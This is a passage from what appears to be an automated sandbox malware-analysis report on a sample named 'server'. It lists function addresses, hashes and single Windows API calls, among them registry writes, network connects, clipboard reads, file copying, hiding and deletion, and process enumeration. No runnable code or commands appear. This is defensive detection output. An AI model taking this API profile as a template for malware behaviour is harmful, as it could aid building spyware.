RegSetValueExW.KERNELBASE(?,00000E90,DFA40B92,00000000,00000000,00000000,00000000), ref: 00D9B3E4

Memory Dump Source

Source File: 00000004.00000002.4624196422.0000000000D9A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D9A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d9a000_server.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 002ea834693e306f9deb89c906076c19add6f38dd7e3d877d13ce19a875b828a
Instruction ID: 6b566c04b4d86467ebe28b0377260470548ec17a2d55f779a4ba08956e39ed8d
Opcode Fuzzy Hash: 002ea834693e306f9deb89c906076c19add6f38dd7e3d877d13ce19a875b828a
Instruction Fuzzy Hash: E4118E76600600AFEB21CF11DD81FA7BBACEF14724F08855AED459B652D364E8089AB6

Function 00D9A61E Relevance: 1.6, APIs: 1, Instructions: 65comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(?), ref: 00D9A690

Memory Dump Source

Source File: 00000004.00000002.4624196422.0000000000D9A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D9A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d9a000_server.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 6cf62dc5ee17650ca730418522704c755d0ce37a34a18e9363e6f6a479001fed
Instruction ID: 13a21b05bde9ee828e478c813f506821005c63fb2c06a948ed783050c20bf78b
Opcode Fuzzy Hash: 6cf62dc5ee17650ca730418522704c755d0ce37a34a18e9363e6f6a479001fed
Instruction Fuzzy Hash: 2A21277140D3C05FDB128B25DC95A52BFB4EF07224F0E84DBD9859F1A3D2699908D7B2

Function 03AA1AAE Relevance: 1.6, APIs: 1, Instructions: 64timeCOMMON

Download Yara Rule

APIs

GetProcessTimes.KERNELBASE(?,00000E90,DFA40B92,00000000,00000000,00000000,00000000), ref: 03AA1B0D

Memory Dump Source

Source File: 00000004.00000002.4627857239.0000000003AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3aa0000_server.jbxd

Similarity

API ID: ProcessTimes
String ID:
API String ID: 1995159646-0
Opcode ID: c5462648fb1475f552f39494db581329aa169fb7ea944ee5cf02cdf042da53f2
Instruction ID: 7a4970c74a50d16993d310f46fd8b28ffbe1727de92fb29c6bbdffd6bb5780ad
Opcode Fuzzy Hash: c5462648fb1475f552f39494db581329aa169fb7ea944ee5cf02cdf042da53f2
Instruction Fuzzy Hash: B211D372500600AFEB21CF55DC85FA6FBECEF04324F08C46AE9498B651E374A4188BB1

Function 03AA1F9A Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

GetProcessWorkingSetSize.KERNEL32(?,00000E90,DFA40B92,00000000,00000000,00000000,00000000), ref: 03AA1FF3

Memory Dump Source

Source File: 00000004.00000002.4627857239.0000000003AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3aa0000_server.jbxd

Similarity

API ID: ProcessSizeWorking
String ID:
API String ID: 3584180929-0
Opcode ID: 2d4d49b929ef47ea977972c32f83165df05684233d3d42247204729273a51bb2
Instruction ID: e7305a0e38cdd6d4b3c10f9b059241ebbc5a8618b707217b9a8e3412cf3f7d81
Opcode Fuzzy Hash: 2d4d49b929ef47ea977972c32f83165df05684233d3d42247204729273a51bb2
Instruction Fuzzy Hash: 8D11E276500600AFEB21CF15CC85FAAB7ACEF00324F0888ABE9058B651D774A918DBB1

Function 03AA207E Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

SetProcessWorkingSetSize.KERNEL32(?,00000E90,DFA40B92,00000000,00000000,00000000,00000000), ref: 03AA20D7

Memory Dump Source

Source File: 00000004.00000002.4627857239.0000000003AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3aa0000_server.jbxd

Similarity

API ID: ProcessSizeWorking
String ID:
API String ID: 3584180929-0
Opcode ID: 2d4d49b929ef47ea977972c32f83165df05684233d3d42247204729273a51bb2
Instruction ID: d5946a48b33d1475f046239278a01f05a6f39c23e768fa75ef5652db170dae29
Opcode Fuzzy Hash: 2d4d49b929ef47ea977972c32f83165df05684233d3d42247204729273a51bb2
Instruction Fuzzy Hash: C811E272500600AFEB11CF14CC85BA6BBACEF00324F08886AED058B651D774A4189AB2

Function 03AA1EBE Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

GetExitCodeProcess.KERNELBASE(?,00000E90,DFA40B92,00000000,00000000,00000000,00000000), ref: 03AA1F14

Memory Dump Source

Source File: 00000004.00000002.4627857239.0000000003AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3aa0000_server.jbxd

Similarity

API ID: CodeExitProcess
String ID:
API String ID: 3861947596-0
Opcode ID: 7ca84ce2c759a89ac03df8bc395088eb34f80e3ae53a34fa65aedee3b6f5b6e2
Instruction ID: 07eca6b6010c322cc320924c1c352601520dc8dba9a69c605e513133c4d47571
Opcode Fuzzy Hash: 7ca84ce2c759a89ac03df8bc395088eb34f80e3ae53a34fa65aedee3b6f5b6e2
Instruction Fuzzy Hash: E611C476600640AFEB11CF15DC85BAAB7ACDF00224F0884ABED09CB652D764A5088BB1

Function 00D9A573 Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00D9A5DE

Memory Dump Source

Source File: 00000004.00000002.4624196422.0000000000D9A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D9A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d9a000_server.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 0aa3a453e6e9d917b8eba87274af8d9751639866684b59229b156b4ff7d81b06
Instruction ID: 79aa415a2977b9f5706d928bbb969dc6488de865abf6dc0552f5f5a1a5eae0ef
Opcode Fuzzy Hash: 0aa3a453e6e9d917b8eba87274af8d9751639866684b59229b156b4ff7d81b06
Instruction Fuzzy Hash: CD117572409780AFDB228F55DC44B62FFB4EF46310F0888DAED858B562C275A419DB61

Function 00D9ADEE Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(?,00000E90,DFA40B92,00000000,00000000,00000000,00000000), ref: 00D9AE4D

Memory Dump Source

Source File: 00000004.00000002.4624196422.0000000000D9A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D9A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d9a000_server.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 93f56315a188e7e598337687225ed52d1d7f06b4bb862b6b89e8a3711537198a
Instruction ID: b916c854d8b8e9f0403ac7c75269ddcc8a4e489f04a8d75800f8b3f9cdbbd292
Opcode Fuzzy Hash: 93f56315a188e7e598337687225ed52d1d7f06b4bb862b6b89e8a3711537198a
Instruction Fuzzy Hash: 7C11C172500300AFEB21CF55DC85FA6FBACEF04324F08885AF9499B661D375A4099BB6

Function 00D9B746 Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON

Download Yara Rule

APIs

CopyFileW.KERNELBASE(?,?,?), ref: 00D9B78E

Memory Dump Source

Source File: 00000004.00000002.4624196422.0000000000D9A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D9A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d9a000_server.jbxd

Similarity

API ID: CopyFile
String ID:
API String ID: 1304948518-0
Opcode ID: 36cea2720a87eaba7b60c66dc39db6ec53f278940d985c4d1be8cae9bdc3043d
Instruction ID: 5c0f0ed817d07dad314bd35d64c1ed752752dda01338cee51c4e723d1149f68c
Opcode Fuzzy Hash: 36cea2720a87eaba7b60c66dc39db6ec53f278940d985c4d1be8cae9bdc3043d
Instruction Fuzzy Hash: C01170755003409FEB50CF65E985B56BBD8EF55720F08C5AADC49CB651D374E804CA71

Function 00D9BB06 Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 00D9BB4E

Memory Dump Source

Source File: 00000004.00000002.4624196422.0000000000D9A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D9A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d9a000_server.jbxd

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 36cea2720a87eaba7b60c66dc39db6ec53f278940d985c4d1be8cae9bdc3043d
Instruction ID: a6a19f1ed47946a7b578e79f215376bddf29850769a60231aabd9901a3f0ef83
Opcode Fuzzy Hash: 36cea2720a87eaba7b60c66dc39db6ec53f278940d985c4d1be8cae9bdc3043d
Instruction Fuzzy Hash: 87117C766002049FEF10CF29ED85B56FBE8EB04328F09C4AADD49CB696D334E804CA71

Function 00D9AC6A Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

GetFileType.KERNELBASE(?,00000E90,DFA40B92,00000000,00000000,00000000,00000000), ref: 00D9ACBD

Memory Dump Source

Source File: 00000004.00000002.4624196422.0000000000D9A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D9A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d9a000_server.jbxd

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: f696d23ba2996fcf2e66a90a9095f3a390446b840cf54d5db42b5fa3c0fa19a3
Instruction ID: b51be73d81678fd28d07d5adbce386e4785db7258aa6451368c29c9d7e07dd07
Opcode Fuzzy Hash: f696d23ba2996fcf2e66a90a9095f3a390446b840cf54d5db42b5fa3c0fa19a3
Instruction Fuzzy Hash: 8F01C476500200AFEB10CF05DC85BA6B7ACDF44724F18C496ED058F751D364E8488AB6

Function 03AA09B0 Relevance: 1.5, APIs: 1, Instructions: 49windowCOMMON

Download Yara Rule

APIs

DispatchMessageA.USER32(?), ref: 03AA0A04

Memory Dump Source

Source File: 00000004.00000002.4627857239.0000000003AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3aa0000_server.jbxd

Similarity

API ID: DispatchMessage
String ID:
API String ID: 2061451462-0
Opcode ID: f4e2b4277560940d450a6b5e375ccc4df4d0e619a8ecb436c0cce86e76b1345c
Instruction ID: ad5cc652073d45d56e2ba5280f0d4d25353be14094ce93348ed3f3e8de2e1b1f
Opcode Fuzzy Hash: f4e2b4277560940d450a6b5e375ccc4df4d0e619a8ecb436c0cce86e76b1345c
Instruction Fuzzy Hash: A4116575409384AFDB12CF15DC44B62BFB8DF46624F0880DAED858B663D265A908C772

Function 03AA1C7E Relevance: 1.5, APIs: 1, Instructions: 49networkCOMMON

Download Yara Rule

APIs

WSAConnect.WS2_32(?,?,?,?,?,?,?), ref: 03AA1CCA

Memory Dump Source

Source File: 00000004.00000002.4627857239.0000000003AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3aa0000_server.jbxd

Similarity

API ID: Connect
String ID:
API String ID: 3144859779-0
Opcode ID: b29ad6281c4d83dfb5cc1cfcd6081d0893921dcca46bad0906b082a6ac7360fe
Instruction ID: ebf779cad4da6cbf55db29e46c7c163ec00a44e71073e4cb589d9d57a6824e09
Opcode Fuzzy Hash: b29ad6281c4d83dfb5cc1cfcd6081d0893921dcca46bad0906b082a6ac7360fe
Instruction Fuzzy Hash: 1E117C76500740AFDB21CF59D885B52FBE4FF04314F08C9AAED498B662D335E419DB61

Function 00D9BE02 Relevance: 1.5, APIs: 1, Instructions: 49COMMON

Download Yara Rule

APIs

K32EnumProcesses.KERNEL32(?,?,?,DFA40B92,00000000,?,?,?,?,?,?,?,?,6CD53C58), ref: 00D9BE42

Memory Dump Source

Source File: 00000004.00000002.4624196422.0000000000D9A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D9A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d9a000_server.jbxd

Similarity

API ID: EnumProcesses
String ID:
API String ID: 84517404-0
Opcode ID: ac4a4c2fd8ac7657886e5faecf4cf43ccca850b5c2d92261565f4bb0cb037d1f
Instruction ID: 6663ddb04c95705f530cce3117aa2310bb2e671d9d265131d223cb1448fa21cc
Opcode Fuzzy Hash: ac4a4c2fd8ac7657886e5faecf4cf43ccca850b5c2d92261565f4bb0cb037d1f
Instruction Fuzzy Hash: 0B115E755002409FDB10CF55D985B96FBE8EF04324F08C4AAEE498B651D375E818DA71

Function 00D9B982 Relevance: 1.5, APIs: 1, Instructions: 48COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNELBASE(?,?), ref: 00D9B9BF

Memory Dump Source

Source File: 00000004.00000002.4624196422.0000000000D9A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D9A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d9a000_server.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: b6f83c7787333adf626b1b2c50ceba17a95bf63fa1cfc16ee7d3ea2e94c9ea82
Instruction ID: c883bb609dd248bbf53662706aeb72de000eb51241e639d6f2eea57e514e09d7
Opcode Fuzzy Hash: b6f83c7787333adf626b1b2c50ceba17a95bf63fa1cfc16ee7d3ea2e94c9ea82
Instruction Fuzzy Hash: 2B016D75600240AFEB108F1AE985B66BB94EB04324F08C4AADD49CB652D375D8048E71

Function 03AA1E16 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

FormatMessageW.KERNELBASE(?,00000E90,?,?), ref: 03AA1E66

Memory Dump Source

Source File: 00000004.00000002.4627857239.0000000003AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3aa0000_server.jbxd

Similarity

API ID: FormatMessage
String ID:
API String ID: 1306739567-0
Opcode ID: 2497efaf9c9214ae1e52b22ab25138a02aa13dae9ee71b49d226fbbaefb2c010
Instruction ID: 9cb143e2eb60f0e591a498d7449d4765010d2177684c4ce8fbc55f82bfe707b1
Opcode Fuzzy Hash: 2497efaf9c9214ae1e52b22ab25138a02aa13dae9ee71b49d226fbbaefb2c010
Instruction Fuzzy Hash: 9801B171A00200AFD310DF16CC46B76FBA8FB84A20F14812AEC089BB41D731B516CBE6

Function 00D9B8CE Relevance: 1.5, APIs: 1, Instructions: 47fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNELBASE(?), ref: 00D9B908

Memory Dump Source

Source File: 00000004.00000002.4624196422.0000000000D9A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D9A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d9a000_server.jbxd

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 5941a66a5a46a20d39b0d767835636791ed9966561f97f28e69c707848cf89f9
Instruction ID: fb2dc453f62b224874baf3be4a60a4961d76513c674e2ed8557d1bb03dec4e6a
Opcode Fuzzy Hash: 5941a66a5a46a20d39b0d767835636791ed9966561f97f28e69c707848cf89f9
Instruction Fuzzy Hash: AF014C76A042409FEB10CF25E985766BB98EF04324F18C4AADE49CB652D775E8088A71

Function 00D9A59A Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00D9A5DE

Memory Dump Source

Source File: 00000004.00000002.4624196422.0000000000D9A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D9A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d9a000_server.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: a29c06a73f94d7ec8c8df8071fa5d7a911e8dc0dd67e4ee7236e78f52a79114a
Instruction ID: 34bd3c359bd1577096ced53cb0cb9db2292ca4353a789bc39442037427c172b0
Opcode Fuzzy Hash: a29c06a73f94d7ec8c8df8071fa5d7a911e8dc0dd67e4ee7236e78f52a79114a
Instruction Fuzzy Hash: D2015B365007409FDF618F55D885B52FBA0EF08324F08C99AEE894A622C376E419DBA2

Function 03AA0E52 Relevance: 1.5, APIs: 1, Instructions: 43registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNELBASE(?,00000E90,?,?), ref: 03AA0EA2

Memory Dump Source

Source File: 00000004.00000002.4627857239.0000000003AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3aa0000_server.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: f1d58c3a253dfa09ed1d16a24235d63caa534ccba5b00b40e969f457a384ea01
Instruction ID: d6d92fe2771b23aa43d60e41f3c85c5f5ad5b251c3ce99ff3607538340e005e8
Opcode Fuzzy Hash: f1d58c3a253dfa09ed1d16a24235d63caa534ccba5b00b40e969f457a384ea01
Instruction Fuzzy Hash: C501A271600600AFD210DF16CC46B76FBA8FB88A24F14811AEC089BB41D771F516CBE6

Function 00D9A72E Relevance: 1.5, APIs: 1, Instructions: 43comclipboardCOMMON

Download Yara Rule

APIs

OleGetClipboard.OLE32(?,00000E90,?,?), ref: 00D9A77E

Memory Dump Source

Source File: 00000004.00000002.4624196422.0000000000D9A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D9A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d9a000_server.jbxd

Similarity

API ID: Clipboard
String ID:
API String ID: 220874293-0
Opcode ID: 9ce8ed5859e2d0e300559d5aea9d019370fd6a3d531c122f0d144b01ddaab2de
Instruction ID: a1de22209ae6911a57a707a6d527e55bbab419091ad2e6ce3fcbc442a4b74c0c
Opcode Fuzzy Hash: 9ce8ed5859e2d0e300559d5aea9d019370fd6a3d531c122f0d144b01ddaab2de
Instruction Fuzzy Hash: 01018671600600AFD310DF16DC46B76FBA8FB88A24F14815AED089BB41D775F516CBE6

Function 00D9A65E Relevance: 1.5, APIs: 1, Instructions: 39comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(?), ref: 00D9A690

Memory Dump Source

Source File: 00000004.00000002.4624196422.0000000000D9A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D9A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d9a000_server.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 33e7aebc5ba07cd34f01990683147db42705cad5cdb687921780daf0e6f2d883
Instruction ID: fbae3d3e85d6cafb822ecfea63b9780a183ade00de3822851c1d20925d920329
Opcode Fuzzy Hash: 33e7aebc5ba07cd34f01990683147db42705cad5cdb687921780daf0e6f2d883
Instruction Fuzzy Hash: A901A2768006409FDF10DF19D885B55FBA4EF00324F0CC4AADD498F612D275E408CAB2

Function 02FD7810 Relevance: 1.5, Strings: 1, Instructions: 287COMMON

Download Yara Rule

Strings

2Ll, xrefs: 02FD7B18

Memory Dump Source

Source File: 00000004.00000002.4627256548.0000000002FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fd0000_server.jbxd

Similarity

API ID:
String ID: 2Ll
API String ID: 0-343416306
Opcode ID: 406ad240d769f96ecea5f4f15c405c6862bd9903d119ac7726b38dcb7cf2403e
Instruction ID: f3ca93e9bbaebd29bee277f08952bf161fe58ea0ba21e66752d2480fefa0a70e
Opcode Fuzzy Hash: 406ad240d769f96ecea5f4f15c405c6862bd9903d119ac7726b38dcb7cf2403e
Instruction Fuzzy Hash: 2AA1DC32B403018BDB14AB79D854BADB3A7EB85398F284629D5129F3E4DF39DD05CB60

Function 03AA09D2 Relevance: 1.5, APIs: 1, Instructions: 35windowCOMMON

Download Yara Rule

APIs

DispatchMessageA.USER32(?), ref: 03AA0A04

Memory Dump Source

Source File: 00000004.00000002.4627857239.0000000003AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3aa0000_server.jbxd

Similarity

API ID: DispatchMessage
String ID:
API String ID: 2061451462-0
Opcode ID: 14a7d75a465d53eb1c021bc88f8dfc2c9e47eb09d6398f38137e9d0e1df23d8b
Instruction ID: 3dd8ade0814fb9ef05edd61e21ecf65fdd9140e9c440100872ff988736896629
Opcode Fuzzy Hash: 14a7d75a465d53eb1c021bc88f8dfc2c9e47eb09d6398f38137e9d0e1df23d8b
Instruction Fuzzy Hash: 92F0AF3A8047449FEB20CF19D885B61FBA4EF04324F4CC0EADD094B762D379A448CAA2

Function 00D9AA12 Relevance: 1.5, APIs: 1, Instructions: 35COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(?), ref: 00D9AA44

Memory Dump Source

Source File: 00000004.00000002.4624196422.0000000000D9A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D9A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d9a000_server.jbxd

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 8f24bcefb2804e5e5173c2a7dc7e8c71070320bcebaa7c813cf72f358139d2cb
Instruction ID: 73bd788ea032d7dd6d78aae0ce7407156a221723683ec37b2df14473406ec34f
Opcode Fuzzy Hash: 8f24bcefb2804e5e5173c2a7dc7e8c71070320bcebaa7c813cf72f358139d2cb
Instruction Fuzzy Hash: F4F0AF368002409FEF208F09D985B65FBA0EF04728F4CC09ADD494B752D379E908CEB2

Function 02FD6B4D Relevance: 1.4, Strings: 1, Instructions: 198COMMON

Download Yara Rule

Strings

:@%l, xrefs: 02FD6CED

Memory Dump Source

Source File: 00000004.00000002.4627256548.0000000002FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fd0000_server.jbxd

Similarity

API ID:
String ID: :@%l
API String ID: 0-1656731533
Opcode ID: db45006d37b7090cefbaabce7f2b7d1938d1e9036da0c52d2650f2b35ff1e447
Instruction ID: 133bbb8761cd0e8de90b046ef705a027d1483e7873e21074a517fd187de038c9
Opcode Fuzzy Hash: db45006d37b7090cefbaabce7f2b7d1938d1e9036da0c52d2650f2b35ff1e447
Instruction Fuzzy Hash: 50914C70A412248FDB24DB34D860BADB7B6EF89348F5041E9D509AB3A0DF359E85CF51

Function 02FD39B7 Relevance: 1.4, Strings: 1, Instructions: 182COMMON

Download Yara Rule

Strings

2Ll, xrefs: 02FD3C26

Memory Dump Source

Source File: 00000004.00000002.4627256548.0000000002FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fd0000_server.jbxd

Similarity

API ID:
String ID: 2Ll
API String ID: 0-343416306
Opcode ID: 4ce52664c45b9191f8a2197ee524fb63263de99d5e23bcfc7aaafa9b6b2e6d2a
Instruction ID: 088538854101b4f6d208e07b4195bb470eaaacfa464307dca2bea188a0c648d5
Opcode Fuzzy Hash: 4ce52664c45b9191f8a2197ee524fb63263de99d5e23bcfc7aaafa9b6b2e6d2a
Instruction Fuzzy Hash: 8D814A31A012188FDB14DFB4C851BEDB7B2EF49308F4045AAD10AAB3A4DB799D85CF61

Function 02FD3B10 Relevance: 1.4, Strings: 1, Instructions: 111COMMON

Download Yara Rule

Strings

2Ll, xrefs: 02FD3C26

Memory Dump Source

Source File: 00000004.00000002.4627256548.0000000002FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fd0000_server.jbxd

Similarity

API ID:
String ID: 2Ll
API String ID: 0-343416306
Opcode ID: 9c2ce60544e908fd10a6fb3432c02c668ac77ffe6cf7e536d65159b90d231575
Instruction ID: 79f4fcb057ccbd060e2b60576ad65388a2024dd2d5efe9b3564bc1540a66dda4
Opcode Fuzzy Hash: 9c2ce60544e908fd10a6fb3432c02c668ac77ffe6cf7e536d65159b90d231575
Instruction Fuzzy Hash: 83412835A012188FDB14DBB5C855BECB7B2AB89308F4045AAD109AB764CB755E48CF62

Function 02FD02C0 Relevance: 1.4, Strings: 1, Instructions: 109COMMON

Download Yara Rule

Strings

:@%l, xrefs: 02FD036D

Memory Dump Source

Source File: 00000004.00000002.4627256548.0000000002FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fd0000_server.jbxd

Similarity

API ID:
String ID: :@%l
API String ID: 0-1656731533
Opcode ID: e8921ad37c919114338362412401df4ece4bacf11c6c3475a9cd72f291210990
Instruction ID: f61bf72ee78c7f3cc2c9d00833d07209ba91c17b0d516364c78f60640a0bdc18
Opcode Fuzzy Hash: e8921ad37c919114338362412401df4ece4bacf11c6c3475a9cd72f291210990
Instruction Fuzzy Hash: 7531C171B012019FDB04AB79D821BBE33ABEB88348F544029D505D7BA4DF3D9D1ACBA1

Function 02FD3DC4 Relevance: .2, Instructions: 193COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4627256548.0000000002FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fd0000_server.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 62a45489efa924ed89398594c5d60295096b29ca76f23cf26d26695670a5c6e1
Instruction ID: fbbb324bfe586dd088ab6ed9f73f5b214a7d331159fff0a9947f1d58bb0e5591
Opcode Fuzzy Hash: 62a45489efa924ed89398594c5d60295096b29ca76f23cf26d26695670a5c6e1
Instruction Fuzzy Hash: 0BA1B174A01218CFDB25DF64D994BEDB7B6FB48308F1041A9D909AB360DB399E85CF40

Function 02FD7BEE Relevance: .1, Instructions: 137COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4627256548.0000000002FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fd0000_server.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f6c9f8b7bcec7ca9bad266a7183b1c8a3249f7aefc33748f825b01c151a818fe
Instruction ID: 84c8d11628abf91eea50a00f527698c63065be00345b0a53f477930fd9694529
Opcode Fuzzy Hash: f6c9f8b7bcec7ca9bad266a7183b1c8a3249f7aefc33748f825b01c151a818fe
Instruction Fuzzy Hash: C341AD32A403018ADB15AF36D8157ADB2E7AB85398F1C8569D511EB2E0DF38DD46CB21

Function 039707E4 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4627737668.0000000003970000.00000040.00000020.00020000.00000000.sdmp, Offset: 03970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3970000_server.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f7cae09fcd886f17391e0d183ec90eb94f97b8827fbc62f66e6dd55c3bf1cd1f
Instruction ID: ce7883342c5e6e20776e5d2364a9b88afb015c3a454ca707c64ab287614ef7a4
Opcode Fuzzy Hash: f7cae09fcd886f17391e0d183ec90eb94f97b8827fbc62f66e6dd55c3bf1cd1f
Instruction Fuzzy Hash: 5F11D631604240DFD715CF14C980B56F7A9AB88708F28C9ACE9494B793C777D813CA91

Function 039707C1 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4627737668.0000000003970000.00000040.00000020.00020000.00000000.sdmp, Offset: 03970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3970000_server.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 917d623f53e5fe8fb36c3776f7dc60667ba44280f4455006419ac040acdb9e91
Instruction ID: 226345a6890932cc49d22d8ef48eefcb08a7906cdf2abac9ca076dd6337c2c78
Opcode Fuzzy Hash: 917d623f53e5fe8fb36c3776f7dc60667ba44280f4455006419ac040acdb9e91
Instruction Fuzzy Hash: FB115E3554D2C5DFC702CB10C990B55BFB1AF46208F2C86EED4888B6A3C37B9816DB52

Function 039705DF Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4627737668.0000000003970000.00000040.00000020.00020000.00000000.sdmp, Offset: 03970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3970000_server.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f95e91cabc98a0567a98b8ef947d59dd30625389976cb320ccfc92990b6a44f
Instruction ID: 102033e387c8255f2004c3c8af0cc4080f85a35766762957d5e612dd90f1597b
Opcode Fuzzy Hash: 2f95e91cabc98a0567a98b8ef947d59dd30625389976cb320ccfc92990b6a44f
Instruction Fuzzy Hash: 5D01D6B65083806FD7018F06DC40863FFB8EF86620749C49FEC4D8B612D225B808CBB1

Function 02FD01E1 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

